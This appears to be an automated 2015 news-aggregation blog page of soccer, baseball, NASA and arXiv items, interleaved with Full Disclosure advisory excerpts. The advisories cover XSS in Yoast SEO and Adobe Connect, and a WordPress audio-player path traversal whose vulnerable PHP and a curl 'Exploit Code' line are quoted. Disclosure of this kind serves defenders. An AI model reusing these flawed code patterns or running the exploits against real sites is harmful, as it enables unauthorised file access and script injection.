Latest YouTube Video

Saturday, June 13, 2015

Orioles Highlight: Manny Machado with HR and 4 RBI, Nolan Reimold 2-run HR and triple in team's 6th straight win (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

[FD] OpenBSD "sys_execve()" Executable Header Parsing Denial of Service Vulnerability

How to fix FIFA: Experts says agency needs outside reformer

RIO DE JANEIRO (AP) Sepp Blatter thinks FIFA can reform itself. Anti-corruption experts say an institution in that much trouble won't be able to clean itself up without an outsider.

from FOX Sports Digital http://ift.tt/1FSPmgN
via IFTTT

Argentina concedes late goal, draws Paraguay in Copa America

RANCAGUA, Chile (AP) Argentina conceded a last-minute equalizer to open its Copa America participation with a disappointing 2-2 draw with Paraguay on Saturday.

from FOX Sports Digital http://ift.tt/1G2ZP8y
via IFTTT

Faeroe Islands beat Greece again in Euro 2016 qualifying

FRANKFURT, Germany (AP) The Faeroe Islands proved the first time wasn't a fluke when it beat Greece again 2-1 in European Championship qualifying on Saturday.

from FOX Sports Digital http://ift.tt/1ec2hUp
via IFTTT

Uruguay defeats Jamaica 1-0 to open Copa America

ANTOFAGASTA, Chile (AP) Defending champion Uruguay defeated Jamaica 1-0 in their Copa America opener on Saturday.

from FOX Sports Digital http://ift.tt/1JQnBKK
via IFTTT

Orioles: SS Everth Cabrera released; hit just .208 with 4 RBIs, 22 K's in 29 games in first season with Baltimore (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Ronaldo nets 3, Portugal beats Armenia 3-2 in Euro qualifier

YEREVAN, Armenia (AP) Cristiano Ronaldo's hat trick gave 10-man Portugal a 3-2 win at Armenia in a 2016 European Championship qualifier on Saturday.

from FOX Sports Digital http://ift.tt/1GEszLs
via IFTTT

Ireland shreds game programs over CEO's FIFA crisis comments

DUBLIN (AP) The Football Association of Ireland says it shredded the 18,000 programs for Saturday's Euro 2016 qualifier against Scotland because they contained comments about the FIFA crisis.

from FOX Sports Digital http://ift.tt/1ebrCxQ
via IFTTT

STEW on Twitter: "New York Times fund keeps donors anonymous http://t.co/M4pnO3F2ZQ (via ...

New York Times fund keeps donors anonymous http://politi.co/1GjnNjm (via @DylanByers) Cool with me, but... 1 retweet 2 favorites. Reply. Retweet 1

from Google Alert - anonymous https://www.google.com/url?rct=j&sa=t&url=https://twitter.com/StewSays/status/609434948987187200&ct=ga&cd=CAIyGjgxMzAxNTQ0ZWE3M2NhMmQ6Y29tOmVuOlVT&usg=AFQjCNFWYV3eCpRqwtqO4TXsnw80fcA7Pw
via IFTTT

Goalkeeper Buffon leaves Italy's squad with injured knee

ROME (AP) Goalkeeper Gianluigi Buffon has left Italy's squad after injuring his right knee in a 1-1 draw at Croatia.

from FOX Sports Digital http://ift.tt/1ebdyUZ
via IFTTT

2 parties cleared for talks on taking over bankrupt Parma

PARMA, Italy (AP) Two parties have been cleared for talks to take over the bankrupt Italian club Parma.

from FOX Sports Digital http://ift.tt/1IaVykY
via IFTTT

Ghana investigates top soccer official over World Cup funds

ACCRA, Ghana (AP) Ghana has ordered an investigation into how the head of the country's soccer association spent $200,000 in government money meant to prepare for the 2014 World Cup.

from FOX Sports Digital http://ift.tt/1L6PwIk
via IFTTT

Speculations on Anonymous Materials

Specualtions on Anonymous Materials. Group exhibition at Fridericianum, Kassel, 2013. Timur Si-Qin — Speculations on Anonymous Materials. back.

from Google Alert - anonymous http://ift.tt/1FRcYm7
via IFTTT

Americans held, Japan through to last 16 at Women's WCup

WINNIPEG, Manitoba (AP) Sweden held the United States to a scoreless draw at the Women's World Cup on Friday, providing a good result for the Swedes and their coach Pia Sundhage, who used to be in charge of the American team.

from FOX Sports Digital http://ift.tt/1GDzKn3
via IFTTT

The Medusa Nebula


Braided, serpentine filaments of glowing gas suggest this nebula's popular name, The Medusa Nebula. Also known as Abell 21, this Medusa is an old planetary nebula some 1,500 light-years away along the southern border of the constellation Gemini. Like its mythological namesake, the nebula is associated with a dramatic transformation. The planetary nebula phase represents a final stage in the evolution of low mass stars like the sun, as they transform themselves from red giants to hot white dwarf stars and in the process shrug off their outer layers. Ultraviolet radiation from the hot star powers the nebular glow. An unrelated, bright, foreground star is near center in this close-up, telescopic view, while the Medusa's transforming central star is actually the dimmer star below center and toward the right-hand part of the frame. The Medusa Nebula is estimated to be over 4 light-years across. via NASA http://ift.tt/1S9BC9h

US soccer defends Hope Solo decisions in letter to senator

WINNIPEG, Manitoba (AP) The head of the U.S. Soccer defended the federation's handling of goalkeeper Hope Solo's domestic assault case in a letter to U.S. Senator Richard Blumenthal on Friday night.

from FOX Sports Digital http://ift.tt/1cRCCie
via IFTTT

Friday, June 12, 2015

Orioles Highlight: Chris Davis with HR and 4 RBI in 11-3 rout of Yankees; 5th straight win, at .500 1st time since May 5 (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

IT Security – Do it the hard or easy way!

Whether you are a one-stop-shop IT guy or a network admin on a large IT team you owe it to yourself to learn about Security Information and Event Management (SIEM) technology. Why? SIEM lets you correlate between events recorded in different logs for related systems. This is significant because attackers often exploit multiple vulnerabilities on separate but connected systems. For a


from The Hacker News http://ift.tt/1Bcq3JT
via IFTTT

Do You also want to Hack Facebook Account of your Girlfriend?

We at The Hacker News get a lot of requests via emails and messages from people who want to hack into someone else’s Facebook account or Gmail account or break into somebody’s network. However, 80 to 90 percent requests we receive every day are from people who want to hack into their girlfriend, boyfriend, wife, or husband’s Facebook account in order to read their private conversations and


from The Hacker News http://ift.tt/1B9407j
via IFTTT

[FD] Yoast Wordpress SEO Plugin <= 2.1.1 Stored, Authenticated XSS

============================================================ Info ============================================================ Affects: Yoast Wordpress SEO Plugin <= 2.1.1 Download URL: http://ift.tt/1dJeqvV Advisory URL: http://ift.tt/1L6hfIZ Acknowledgement: http://ift.tt/1dJeqvW ============================================================ Description ============================================================ The "snippet preview" functionality of the Yoast WordPress SEO plugin prior to version 2.2 was susceptible to cross-site scripting in the admin panel, related to the "metabox" functionality. This vulnerability appears to have been reported 2 years ago by someone named "badconker" (link: http://ift.tt/1L6hd3V), but the plugin author said that it had already been patched at the time. The issue can be triggered by entering arbitrary HTML into the post title field, such as in the example URL provided below. ============================================================ Vulnerable URL ============================================================ http://ift.tt/1GjR4KN ============================================================ Vulnerable Code ============================================================ try { str = jQuery('').html(str).text(); str = str.replace(/<\/?[^>]+>/gi, ''); str = str.replace(/\[(.+?)\](.+?\[\/\\1\])?/g, ''); } catch (e) {} Link: http://ift.tt/1L6hfJ1 ============================================================ Fix ============================================================ Updating to the latest version (2.2.1 at the time of this advisory) will fix this issue.

Source: Gmail -> IFTTT-> Blogger

Mexico-Bolivia ends scoreless at Copa America

VINA DEL MAR, Chile (AP) Mexico and Bolivia played a lackluster 0-0 draw Friday in the second match of the Copa America, the South American championship.

from FOX Sports Digital http://ift.tt/1IAKSPp
via IFTTT

Simon scores twice in 2-0 Australia win over Nigeria

WINNIPEG, Manitoba (AP) Kyah Simon scored twice to lead Australia to a 2-0 victory over Nigeria in a group stage match Friday at the Women's World Cup.

from FOX Sports Digital http://ift.tt/1HBwxDw
via IFTTT

I have a new follower on Twitter


Peter Meek
Currently a Level 4 FA Referee, Reading FC fan and loves Coldplay. These are the views of myself and myself only
Camberley

Following: 963 - Followers: 297

June 12, 2015 at 05:31PM via Twitter http://twitter.com/Ref_r_u_blind

Bale grabs winner, Wales beat Belgium 1-0 in Euro qualifying

CARDIFF, Wales (AP) Gareth Bale pounced on a defensive error to give Wales a 1-0 win over Belgium in European Championship qualifying on Friday, lifting his team atop Group B and within sight of a first major tournament since 1958.

from FOX Sports Digital http://ift.tt/1KLPjcj
via IFTTT

Wijnaldum, Narsingh score as Netherlands beats Latvia 2-0

RIGA, Latvia (AP) PSV Eindhoven teammates Georginio Wijnaldum and Luciano Narsingh scored second-half goals Friday as the Netherlands beat Latvia 2-0 in Riga to move closer to second place in its European Championship qualifying group.

from FOX Sports Digital http://ift.tt/1GCSyD6
via IFTTT

Swastika pattern depicted on pitch during Croatia vs. Italy

SPLIT, Croatia (AP) Croatia could face punishment by UEFA after a swastika pattern could be seen on the pitch for its European Championship qualifying match against Italy.

from FOX Sports Digital http://ift.tt/1QTbvAZ
via IFTTT

CAF signs new marketing deal with Sportfive until 2028

PARIS (AP) The African Football Confederation has extended its marketing and media rights deal with Sportfive for another 12 years, extending their partnership until 2028.

from FOX Sports Digital http://ift.tt/1FPxm7b
via IFTTT

Fantasy MLB: Yankees P Michael Pineda is 3-0 with 2.56 ERA, 50 K's in 6 starts vs. Orioles; 16 K's, W in last meeting (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Andre Breitenreiter hired as coach of Schalke

GELSENKIRCHEN, Germany (AP) Schalke says it has hired Andre Breitenreiter of relegated Paderborn as new coach.

from FOX Sports Digital http://ift.tt/1cQgHbh
via IFTTT

Defiant Warner to challenge extradition from Trinidad to US

PORT-OF-SPAIN, Trinidad (AP) A defiant Jack Warner is predicting a lengthy legal battle to extradite him from Trinidad and Tobago to the U.S. to charges in the FIFA corruption case.

from FOX Sports Digital http://ift.tt/1FP3EPI
via IFTTT

CAS sets target for Serbia, Albania Euro 2016 case verdicts

LAUSANNE, Switzerland (AP) A court ruling for appeals filed by the Serbian and Albanian football federation against UEFA sanctions after their European Championship qualifier was abandoned is expected by July 10.

from FOX Sports Digital http://ift.tt/1IO9bMx
via IFTTT

I have a new follower on Twitter


Funny Photos
funniest photos from all over the world


Following: 11042 - Followers: 11998

June 12, 2015 at 10:40AM via Twitter http://twitter.com/PhotoFunKill

ISS Daily Summary Report – 6/11/15

41 Soyuz (41S) Undock/Landing:  41S undocked and landed today at approximately 8:44 CDT, bringing Terry Virts, Anton Shkaplerov and Samantha Cristoforetti back to Earth. The undock began 3-crew operations on the ISS until the arrival of 43S currently planned for late in July. 41S Return Sample Collections Transfer: Kelly collected saliva, buccal, urine, and blood for Twins Study, Biochemical Profile, CardioOx, Salivary Markers, and Microbiome.  Cristoforetti collected ambient collections for Microbiome and Salivary Markers.  The samples to be frozen were inserted into Minus Eighty Degree Celsius Laboratory Freezer for ISS (MELFI) for return on a future flight. The ambient samples were handed over to be packed in the Soyuz.  Additionally, Cristoforetti packed the Stem Cell Differentiation (SCD) samples from MELFI into the SCD Experiment Pouches and transferred them to Shkaplerov for final packing in the Soyuz. Today’s Planned Activities All activities were completed unless otherwise noted. TWIN – Saliva Sample Collection HRF Blood Draw and Stow Prep Morning Inspection TWIN – Saliva Sample Collection HRF – Sample MELFI Insertion HRF Urine Sample Collection TWIN – Urine Sample Collection HRF – Sample MELFI Insertion ТК 715 Return Cargo Ops / r/g 8970 Setup GoPro HERO3 camera in ТК 715 [СА] Closing window shutters 6,8,9,12,13,14 / r/g 6965 Data Prep for Return EHS – IV-TEPC Transfer Stem Cell Differentiation (SCD) – Container Retrieval from MELFI Separation of EDV (KOV) (Separate EDV (KOV) No.1106 to EDV (KOV) No.1104) for Elektron or EDV-SV Stem Cell Differentiation (SCD) – Experiment Container Packing for Return Personal Medication Stowage SALMARK – Questionnaire Completion SCD Transfer WRS – Recycle Tank Fill HRF Closeout Ops TWIN – Blood Collection TWIN – Blood collection operator JRNL – Journal Entry HRF – Blood collection operator HRF Blood Draw Photo of ТК 715 [СА] and items prior to undocking / r/g 8970 TWIN – Gathering and pre-packing blood samples for return SALMARK – Questionnaire Completion Soyuz 715 Loading Complete Report (S-band) / r/g 8970, 8650 RR-HABITAT-STOW Photography of the external surface of Soyuz 715 [СА] БО hatch cover to assess slot antenna r/g 0284 Downlink photo of the outer side of ТК 715 [СА] БО hatch/manhole cover / r/g 0284 Glacier 5 – Desiccant Pack Swap GLACIER5 Battery Changeout HRF Urine Sample Collection Comm Config for ТК 715 Undocking and Descent  r/g 8229 HRF – Sample MELFI Insertion Disconnecting TVS Camera КЛ-153 from МRM1 TVS / r/g 7144 Soyuz 715 Activation, Comm Check from Soyuz 715 via S/G2 / Ascent and Descent r/g 9020, 9045,9067 ISS HAM RADIO Power Down Health Maintenance System (HMS) – Food Frequency Questionnaire TWIN – Equipment Stowage Gathering and Connecting КСПЭ Equipment for Hatch Closure coverage from MRM1 with simultaneous recording to CF card in mpeg2 format via Ku-band Closing USOS Window Shutters Soyuz 715 – MRM1 Hatch Closure r/g 9067 TV coverage of ТК 715-MRM1 Hatch Closure ТК 715- MRM1 hatch leak check / Ascent and Descent Downlink of TV coverage Hatch Closure data from MRM1 КСПЭ hardware Deactivation and Closing Applications on ЦП SSC ТК 715 ODF Ops; Undocking and Descent Ops HAP2 – Hardware Stowage Monitoring Soyuz 715 Undocking, photos of ТК docking assembly /  r/g 9066 Video of ТК 715 Undocking and Departure from ISS / r/g 9065 SPRINT. System Setup [Deferred] Reconfigure MRM1-Soyuz PEV to CLOSED position ISTOCHNIK-M Preparation For Measurements. / r/g 9068 ISTOCHNIK-M. Activation of ТК 715 TLM Recording Mode. / r/g 9068 ISTOCHNIK-M Closeout Ops / r/g 9068 ТК 715 comm reconfig for nominal ops after landing Completed Task List Items None Ground Activities All activities were completed unless otherwise noted. 41S undock operations Three-Day Look Ahead: Friday, 06/12: Sprint VO2 ops, Radiation Dosimetry Saturday, 06/13: Crew off duty, housekeeping Sunday, 06/14: Crew off duty QUICK ISS Status – Environmental Control Group:                               Component Status Elektron On Vozdukh Manual [СКВ] 1 – SM Air Conditioner System (“SKV1”) On [СКВ] 2 – SM Air Conditioner System (“SKV2”) Off Carbon Dioxide Removal Assembly (CDRA) Lab Standby Carbon Dioxide Removal Assembly (CDRA) Node 3 Operate Major Constituent Analyzer (MCA) Lab Shutdown Major Constituent Analyzer (MCA) Node 3 Operate Oxygen Generation Assembly (OGA) Standby Urine Processing Assembly (UPA) Standby Trace Contaminant Control System (TCCS) Lab Off Trace Contaminant Control System (TCCS) Node 3 Full Up  

from ISS On-Orbit Status Report http://ift.tt/1HzqOOC
via IFTTT

Franck Ribery suffers setback with ankle injury

MUNICH (AP) Bayern Munich says winger Franck Ribery's ankle injury has failed to respond to conservative treatment and that his right foot has been immobilized.

from FOX Sports Digital http://ift.tt/1GiWW6T
via IFTTT

[FD] The token order of OpVectorTimesScalar and OpMatrixTimesScalar which generated in glslangValidator isn't consistant with SPEC

Hi, According to SPIR-V spec, OpVectorTimesScalar's first source operand is vector and secondary is scalar, and OpMatrixTimesScalar's first source operand is matrix and secondary is scalar. But it seems the token order generated by glslangValidator isn't consistant with sepc. It is better if you can update glslangValidator to match spec's behavior. following is a simple sample, in case you need it. Example: GLSL soruce: #version 440 in layout(location = 0) vec4 v0; in layout(location = 1) float s1; in layout(location = 2) mat4 m2; out layout(location = 2) mat4 om2; void main() { gl_Position = s1 * v0; om2 = s1 * m2; } SPIR-V generated glslangValidator: ... 4(main): 2 Function None 3 5: Label 20: 7(float) Load 19(s1) 23: 8(fvec4) Load 22(v0) 24: 8(fvec4) VectorTimesScalar 20 23 <== 20 is float and 23 is vector 26: 25(ptr) AccessChain 15 17 Store 26 24 30: 7(float) Load 19(s1) 33: 27 Load 32(m2) 34: 27 MatrixTimesScalar 30 33 <== 30 is float and 33 is matrix Store 29(om2) 34 Branch 6 6: Label Return FunctionEnd Best Regards Qun

Source: Gmail -> IFTTT-> Blogger

Interpol suspends $22M FIFA project during corruption crisis

LYON, France (AP) Interpol has suspended its 10-year, 20 million euro ($22.4 million) partnership with FIFA while soccer's governing body is implicated in bribery allegations.

from FOX Sports Digital http://ift.tt/1KJMecR
via IFTTT

The 2015 Earth-Orbiting Heliophysics Fleet

There've been a few changes since the 2013 Earth-Orbiting Heliophysics Fleet. As of Spring of 2015, here's a tour of the NASA Near-Earth Heliophysics fleet, covering the space from near-Earth orbit out to the orbit of the Moon.The satellite orbits are color coded for their observing program:Magenta: TIM (Thermosphere, Ionosphere, Mesosphere) observationsYellow: solar observations and imageryCyan: Geospace and magnetosphereViolet: Heliospheric observationsNear-Earth Fleet:Hinode: Observes the Sun in multiple wavelengths up to x-rays. SVS pageRHESSI : Observes the Sun in x-rays and gamma-rays. SVS pageTIMED: Studies the upper layers (40-110 miles up) of the Earth's atmosphere.FAST: Measures particles and fields in regions where aurora form.CINDI: Measures interactions of neutral and charged particles in the ionosphere. SORCE: Monitors solar intensity across a broad range of the electromagnetic spectrum.AIM: Images and measures noctilucent clouds. SVS pageVan Allen Probes: Two probes moving along the same orbit esigned to study the impact of space weather on Earth's radiation belts. SVS pageTWINS: Two Wide-Angle Imaging Neutral-Atom Spectrometers (TWINS) are two probes observing the Earth with neutral atom imagers.IRIS: Interface Region Imaging Spectrograph is designed to take high-resolution spectra and images of the region between the solar photosphere and solar atmosphere.Geosynchronous Fleet:SDO: Solar Dynamics Observatory keeps the Sun under continuous observation at 16 megapixel resolution.Geospace Fleet:Geotail: Conducts measurements of electrons and ions in the Earth's magnetotail. Magnetospheric Multi-scale (MMS): This is a group of four satellites which fly in formation to measure how particles and fields in the magnetosphere vary in space and time. SVS pageTHEMIS: This is a fleet of three satellites to study how magnetospheric instabilities produce substorms. Two of the original five satellites were moved into lunar orbit to become ARTEMIS. SVS page IBEX: The Interstellar Boundary Explorer measures the flux of neutral atoms from the heliopause.Lunar Orbiting FleetARTEMIS: Two of the THEMIS satellites were moved into lunar orbit to study the interaction of the Earth's magnetosphere with the Moon. Major changes with earlier versions: MMS addedGOES satellites removedCluster satellites removedCamera moves around the night-side of Earth.

from NASA's Scientific Visualization Studio: Most Recent Items http://ift.tt/1IMvWR0
via IFTTT

Norway draws top-ranked Germany 1-1 at Women's WCup

OTTAWA, Ontario (AP) Norway's Maren Mjelde scored from a free kick in the second half to secure a fortunate 1-1 draw against Germany in Thursday's clash of former champions at the Women's World Cup.

from FOX Sports Digital http://ift.tt/1QQDBg9
via IFTTT

The Light, the Dark, and the Dusty


This colorful skyscape spans about three full moons (1.5 degrees) across nebula rich starfields along the plane of our Milky Way Galaxy in the royal northern constellation Cepheus. Near the edge of the region's massive molecular cloud some 2,400 light-years away, bright reddish emission region Sharpless (Sh) 155 lies at the upper left, also known as the Cave Nebula. About 10 light-years across the cosmic cave's bright rims of gas are ionized by ultraviolet light from hot young stars. Dusty blue reflection nebulae also abound on the interstellar canvas cut by dense obscuring clouds of dust. The long core of the Lynds Dark Nebula (LDN) 1210 anchors the scene at lower right. Astronomical explorations have revealed other dramatic signs of star formation, including the bright red fleck of Herbig-Haro (HH) 168. Directly below the bright Cave Nebula, the Herbig-Haro object emission is generated by energetic jets from a newborn star. via NASA http://ift.tt/1KrqKkE

Thursday, June 11, 2015

Orioles Highlight: Adam Jones, Nolan Reimold and Manny Machado HR in 6-5 win over Red Sox; 1st series sweep of season (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Host Chile beats Ecuador 2-0 in Copa America opener

SANTIAGO, Chile (AP) Arturo Vidal and Eduardo Vargas scored second-half goals to give Chile a 2-0 win over Ecuador on Thursday in the opening match of the Copa America, the South American championship that got under way amid the corruption investigation involving local football officials.

from FOX Sports Digital http://ift.tt/1JNxpFq
via IFTTT

Brazilian football confederation introduces term limits

SAO PAULO (AP) The Brazilian football confederation has introduced term limits for its presidents, keeping them from being in power for more than eight consecutive years.

from FOX Sports Digital http://ift.tt/1e7drtQ
via IFTTT

I keep 200+ Browser Tabs Open, and My Computer Runs Absolutely Fine. Here’s My Secret.

I don't know about your part, but I make heavy use of tabs. I currently have 200+ tabs open in my Google Chrome Web browser. And sometimes the number is even more. For me it's a daily thing, as I regularly open new tabs because of my habit of reading lots of stuff online, including cyber security updates, hacking news, knowledgeable articles of various categories, new recipes to cook


from The Hacker News http://ift.tt/1JJ5UOT
via IFTTT

MA Book of Meditations

This project is an exciting way to be of service to Marijuana Anonymous, as well as an unique opportunity for you to leave a lasting legacy to our ...

from Google Alert - anonymous http://ift.tt/1B6yLtq
via IFTTT

Cavani apologizes for saying Jamaica is an African team

ANTOFAGASTA, Chile (AP) Uruguay striker Edinson Cavani has apologized for calling Jamaica an African team.

from FOX Sports Digital http://ift.tt/1QswiAt
via IFTTT

Bayesian Poisson Tensor Factorization for Inferring Multilateral Relations from Sparse Dyadic Event Counts. (arXiv:1506.03493v1 [stat.ML])

We present a Bayesian tensor factorization model for inferring latent group structures from dynamic pairwise interaction patterns. For decades, political scientists have collected and analyzed records of the form "country $i$ took action $a$ toward country $j$ at time $t$"---known as dyadic events---in order to form and test theories of international relations. We represent these event data as a tensor of counts and develop Bayesian Poisson tensor factorization to infer a low-dimensional, interpretable representation of their salient patterns. We demonstrate that our model's predictive performance is better than that of standard non-negative tensor factorization methods. We also provide a comparison of our variational updates to their maximum likelihood counterparts. In doing so, we identify a better way to form point estimates of the latent factors than that typically used in Bayesian Poisson matrix factorization. Finally, we showcase our model as an exploratory analysis tool for political scientists. We show that the inferred latent factor matrices capture interpretable multilateral relations that both conform to and inform our knowledge of international affairs.



from cs.AI updates on arXiv.org http://ift.tt/1QsvxHF
via IFTTT

Bootstrapping Skills. (arXiv:1506.03624v1 [cs.AI])

The monolithic approach to policy representation in Markov Decision Processes (MDPs) looks for a single policy that can be represented as a function from states to actions. For the monolithic approach to succeed (and this is not always possible), a complex feature representation is often necessary since the policy is a complex object that has to prescribe what actions to take all over the state space. This is especially true in large domains with complicated dynamics. It is also computationally inefficient to both learn and plan in MDPs using a complex monolithic approach. We present a different approach where we restrict the policy space to policies that can be represented as combinations of simpler, parameterized skills---a type of temporally extended action, with a simple policy representation. We introduce Learning Skills via Bootstrapping (LSB) that can use a broad family of Reinforcement Learning (RL) algorithms as a "black box" to iteratively learn parametrized skills. Initially, the learned skills are short-sighted but each iteration of the algorithm allows the skills to bootstrap off one another, improving each skill in the process. We prove that this bootstrapping process returns a near-optimal policy. Furthermore, our experiments demonstrate that LSB can solve MDPs that, given the same representational power, could not be solved by a monolithic approach. Thus, planning with learned skills results in better policies without requiring complex policy representations.



from cs.AI updates on arXiv.org http://ift.tt/1Fcd0DB
via IFTTT

Long-term causal effects of interventions in multiagent economic mechanisms. (arXiv:1501.02315v3 [stat.ME] UPDATED)

The effect of an intervention in an economic mechanism, for example an increase in the reserve price of an auction, is causal if the observed effect is better than the counterfactual, i.e., the effect that would be observed under no intervention. As mechanisms are populated by dynamical systems of interacting agents, their response to an intervention fluctuates until the system reaches a new equilibrium. Effects measured in the new equilibrium, the long-term causal effects, are more representative of the value of interventions. However, the statistical estimation of long-term causal effects is difficult because it has to rely, for practical reasons, on data observed before the new equilibrium is reached. Furthermore, agent actions do not only depend on the mechanism that the agents are situated in but also on the behavior of others, which complicates the causal evaluation. In this paper, we formalize this problem of estimating long-term causal effects under the potential outcomes framework of causal inference \cite{neyman1923, rubin74}. We develop an estimation method that relies on a data augmentation strategy, where agents are assumed to adopt, at each timepoint, a behavior that is latent. This allows us to leverage existing work in behavioral game theory and time-series analysis of compositional data. Our method identifies the long-term causal effects under a set of assumptions that we formulate explicitly. We illustrate our method on a dataset from a real-world behavioral experiment, and discuss open problems to stimulate future research.



from cs.AI updates on arXiv.org http://ift.tt/1AK82il
via IFTTT

Vatican suspends deal with CONMEBOL amid investigation

BUENOS AIRES, Argentina (AP) The Vatican has suspended an agreement with the South American football confederation because of the corruption allegations against local officials.

from FOX Sports Digital http://ift.tt/1JIZyio
via IFTTT

I've generated a matlab anonymous function. I get errors on calling it

syms ax ay az bx by bz k double a=[ax ay az]' au=a./sqrt(ax^2+ay^2+az^2) b=[bx by bz]' bu=b./sqrt(bx^2+by^2+bz^2) R=[bu(1)*au(1) bu(1)*au(2) ...

from Google Alert - anonymous http://ift.tt/1I7JaC4
via IFTTT

Safe Helpline Rectangular Web Banner - "Anonymous"

Safe Helpline Rectangular Web Banner - "Anonymous". Incorporate Safe Helpline directly into your website! Many Service members bookmark the ...

from Google Alert - anonymous http://ift.tt/1QsnE53
via IFTTT

I have a new follower on Twitter


SQL Professionals
A Microsoft SQL Server Consultancy
Minneapolis, MN
http://t.co/3NEdo4HL4M
Following: 4563 - Followers: 4711

June 11, 2015 at 06:29PM via Twitter http://twitter.com/sqlpros

[FD] XSS vulnerability Adobe Connect 9.3 (CVE-2015-0343 )

Advisory: Adobe Connect Reflected XSS Author: Stas Volfus (Bugsec Information Security LTD) Vendor URL: http://www.adobe.com/ Status: Vendor Notified ========================== Vulnerability Description ========================== Adobe Connect (Central) version: 9.3 is vulnerable to Reflected XSS (Cross Site Scripting). The attack allows execution of arbitrary JavaScript in the context of the user’s browser. CVE id: CVE-2015-0343 assigned for this issue. ========================== PoC ========================== The following URL demonstrates the vulnerability: http://ift.tt/1S8MowCXSS Link ========================== Disclosure Timeline ========================== 04-NOV-2014 - Vendor notified 01-DEC-2014 - CVE assigned 27-MAR-2015 - Resolved by vendor, fix deployed on Adobe Connect 9.4. ========================== References ==========================http://ift.tt/1GwLBS3 http://ift.tt/1S8Mp3v

Source: Gmail -> IFTTT-> Blogger

[FD] D-Link DSP-W110 - multiple vulnerabilities

>> D-Link DSP-W110 - multiple vulnerabilities -

Source: Gmail -> IFTTT-> Blogger

Fabregas leads Spain's 2-1 win over Costa Rica in friendly

LEON, Spain (AP) Cesc Fabregas scored one goal and set up another to lead Spain's 2-1 comeback win over Costa Rica in a friendly on Thursday.

from FOX Sports Digital http://ift.tt/1FMR0R4
via IFTTT

[FD] Path Traversal vulnerability in Wordpress plugin se-html5-album-audio-player v1.1.0

Title: Path Traversal vulnerability in Wordpress plugin se-html5-album-audio-player v1.1.0 Author: Larry W. Cashdollar, @_larry0 Date: 2015-06-06 Advisory: http://ift.tt/1B7cBai Download Site: http://ift.tt/1lcs4d8 Vendor: http://ift.tt/1B7cBak Vendor Notified: 2015-06-06 Vendor Contact: http://ift.tt/1B7cBak Description: An HTML5 Album Audio Player. A plugin to archive, present, and play collections of mp3s (or other html5 audio formats) as albums within your post. Vulnerability: The se-html5-album-audio-player v1.1.0 plugin for wordpress has a remote file download vulnerability. The download_audio.php file does not correctly check the file path, it only attempts to check if the path is in /wp-content/uploads which is easily defeated with ../. This vulnerability doesn’t require authentication to the Wordpress site. File ./se-html5-album-audio-player/download_audio.php: 3 $file_name = $_SERVER['DOCUMENT_ROOT'] . $_GET['file']; 4 $is_in_uploads_dir = strpos($file_name, '/wp-content/uploads/'); 5 // make sure it's a file before doing anything! 6 if( is_file($file_name) && $is_in_uploads_dir !== false ) { 7 8 // required for IE 9 if(ini_get('zlib.output_compression')) { ini_set('zlib.output_compression', 'Off'); } 10 11 // get the file mime type using the file extension 12 switch(strtolower(substr(strrchr($file_name, '.'), 1))) { 13 case 'pdf': $mime = 'application/pdf'; break; 14 case 'zip': $mime = 'application/zip'; break; 15 case 'jpeg': 16 case 'jpg': $mime = 'image/jpg'; break; 17 default: $mime = 'application/force-download'; 18 } 19 header('Pragma: public'); // required 20 header('Expires: 0'); // no cache 21 header('Cache-Control: must-revalidate, post-check=0, pre-check=0'); 22 header('Last-Modified: '.gmdate ('D, d M Y H:i:s', filemtime ($file_name)).' GMT'); 23 header('Cache-Control: private',false); 24 header('Content-Type: '.$mime); 25 header('Content-Disposition: attachment; filename="'.basename($file_name).'"'); 26 header('Content-Transfer-Encoding: binary'); 27 header('Content-Length: '.filesize($file_name)); // provide file size 28 header('Connection: close'); 29 readfile($file_name); // push it out 30 exit(); The above code does not verify if a user is logged in, and do proper sanity checking if the file is outside of the uploads directory. CVEID: 2015-4414 OSVDB: Exploit Code: • $ curl http://ift.tt/1Qs7Eje

Source: Gmail -> IFTTT-> Blogger

[FD] 6kbbs v8.0 Weak Encryption Cryptography Security Vulnerabilities

*6kbbs v8.0 Weak Encryption Cryptography Security Vulnerabilities* Exploit Title: 6kbbs Weak Encryption Web Security Vulnerabilities Vendor: 6kbbs Product: 6kbbs Vulnerable Versions: v7.1 v8.0 Tested Version: v7.1 v8.0 Advisory Publication: June 08, 2015 Latest Update: June 10, 2015 Vulnerability Type: Inadequate Encryption Strength [CWE-326] CVE Reference: * CVSS Severity (version 2.0): Discover and Reporter: Wang Jing [School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore] (@justqdjing) *Recommendation Details:* *(1) Vendor & Product Description:* Vendor: 6kbbs *Product & Vulnerable Versions:* 6kbbs v7.1 v8.0 *Vendor URL & download:* 6kbbs can be gain from here, http://ift.tt/1xQmsQh *Product Introduction Overview:* "6kbbs V8.0 is a PHP + MySQL built using high-performance forum, has the code simple, easy to use, powerful, fast and so on. It is an excellent community forum program. The program is simple but not simple; fast, small; Interface generous and good scalability; functional and practical pursuing superior performance, good interface, the user's preferred utility functions. Forum Technical realization (a) interface : using XHTML + CSS structure, so the structure of the page , easy to modify the interface ; save the transmission static page code , greatly reducing the amount of data transmitted over the network ; improve the interface scalability , more in line with WEB standards, support Internet Explorer, FireFox, Opera and other major browsers. (b) Program : The ASP + ACCESS mature technology , the installation process is extremely simple , the environment is also very common." "(1) PHP version : (a) 6kbbs V8.0 start using PHP + MySQL architecture. (b) Currently ( July 2010 ) is still in the testing phase , 6kbbs V8.0 is the latest official release. (2) ASP Version: 6kbbs (6k Forum) is an excellent community forum process . The program is simple but not simple ; fast , small ; interface generous and good scalability ; functional and practical . pursue superiority , good interface , practical functions of choice for subscribers." *(2) Vulnerability Details:* 6kbbs web application has a computer security problem. It can be exploited by weak encryption attacks. The software stores or transmits sensitive data using an encryption scheme that is theoretically sound, but is not strong enough for the level of protection required. A weak encryption scheme can be subjected to brute force attacks that have a reasonable chance of succeeding using current attack methods and resources. Several 6kbbs products 0-day web cyber bugs have been found by some other bug hunter researchers before. 6kbbs has patched some of them. "The Full Disclosure mailing list is a public forum for detailed discussion of vulnerabilities and exploitation techniques, as well as tools, papers, news, and events of interest to the community. FD differs from other security lists in its open nature and support for researchers' right to decide how to disclose their own discovered bugs. The full disclosure movement has been credited with forcing vendors to better secure their products and to publicly acknowledge and fix flaws rather than 